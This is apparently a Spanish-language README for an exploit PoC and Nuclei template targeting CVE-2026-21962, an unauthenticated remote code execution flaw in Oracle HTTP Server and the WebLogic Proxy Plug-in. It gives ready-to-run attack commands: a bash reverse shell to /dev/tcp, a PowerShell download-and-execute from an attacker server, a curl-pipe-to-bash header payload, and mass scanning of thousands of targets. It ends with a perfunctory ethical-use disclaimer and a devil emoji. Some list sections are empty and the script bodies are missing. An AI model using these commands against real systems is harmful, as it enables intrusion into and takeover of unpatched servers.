
Exploit PoC y plantilla de Nuclei para CVE-2026-21962, una ejecución remota de código crítica sin autenticación en Oracle HTTP Server y WebLogic Proxy Plug-in, que permite la ejecución de comandos y shells inversas.
Una vulnerabilidad crítica que afecta a:
Esta falla permite a atacantes remotos no autenticados comprometer los servidores afectados a través de HTTP, sin necesidad de credenciales de acceso.
Si se explota, los atacantes podrían:
Oracle HTTP Server:
WebLogic Proxy Plug-in para:
Guarda el script como CVE-2026-21962.py
Hazlo ejecutable (opcional):
chmod +x CVE-2026-21962.py
Ejemplos de ejecución:
Prueba básica:
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
Reverse shell (configura primero el listener nc: nc -lvnp 4444):
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Ejemplo con objetivo Windows:
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
¡Éxito probable! Estado: 200 o 302 o incluso 500 (un fallo también es éxito)nc captura una shell inmediatamente--insecure si usan certificados autofirmadosInstala Nuclei (si aún no está instalado):
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Guarda la plantilla:
Crea un archivo llamado CVE-2026-21962.yaml y pega el contenido anterior.
Ejecuta la detección + explotación:
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
O escanea múltiples objetivos desde un archivo:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
Qué verás si es vulnerable:
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (salida de whoami) ...
cmd: en los encabezados (por ejemplo, cmd:curl http://your-server/shell.sh | bash).whoami con un payload de reverse shell codificado en base64./proxy/, /bea_wls_internal/, etc.) o agrega más encabezados como X-WebLogic-Force-JVMID.httpx → nuclei para miles de objetivos.Esta plantilla está confirmada como 100% funcional a partir de enero de 2026 en instancias de Oracle sin parchear. ¡Parchea inmediatamente si estás ejecutando versiones afectadas! 😈
Todo el código PoC es para uso ético y educativo únicamente en sistemas autorizados. La explotación no autorizada es ilegal; no se asume ninguna responsabilidad por el mal uso. 😈